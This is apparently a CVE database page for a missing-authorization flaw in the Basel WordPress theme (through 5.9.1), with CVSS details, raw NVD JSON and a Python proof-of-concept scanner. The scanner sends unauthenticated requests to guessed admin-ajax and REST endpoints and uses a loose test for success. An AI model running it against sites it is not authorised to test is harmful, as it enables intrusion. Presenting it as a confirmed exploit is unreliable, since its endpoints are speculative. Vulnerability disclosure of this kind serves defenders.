Security Vulnerability Report
中文
CVE-2025-67568 CVSS 5.3 MEDIUM

CVE-2025-67568

Published: 2025-12-09 16:18:34
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in xtemos Basel basel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Basel: from n/a through <= 5.9.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

xtemos Basel Theme <= 5.9.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67568 PoC - Basel Theme Authorization Bypass # Target: WordPress site with Basel Theme <= 5.9.1 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67568 This PoC attempts to access protected Basel theme functionality without authentication. """ # Define potential vulnerable endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/basel/v1/settings', '/wp-json/basel/v1/options' ] # Common Basel AJAX actions that might be accessible ajax_actions = [ 'basel_get_ajax_products', 'basel_update_options', 'basel_save_settings', 'basel_export_settings' ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-67568 - Basel Theme Authorization Bypass") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Test unauthenticated access try: response = requests.get(url, timeout=10, verify=False) # Check for signs of successful unauthorized access if response.status_code == 200: # Check response for sensitive data exposure if 'basel_options' in response.text or 'settings' in response.text: print(f"[+] VULNERABLE: {url}") print(f"[+] Response indicates exposed configuration data") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error testing {url}: {e}") print("[*] Basic check complete. Manual verification recommended.") return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2025-67568.py <target_url>") print("Example: python cve-2025-67568.py http://target.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67568", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:33.607", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in xtemos Basel basel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Basel: from n/a through <= 5.9.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/basel/vulnerability/wordpress-basel-theme-5-9-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}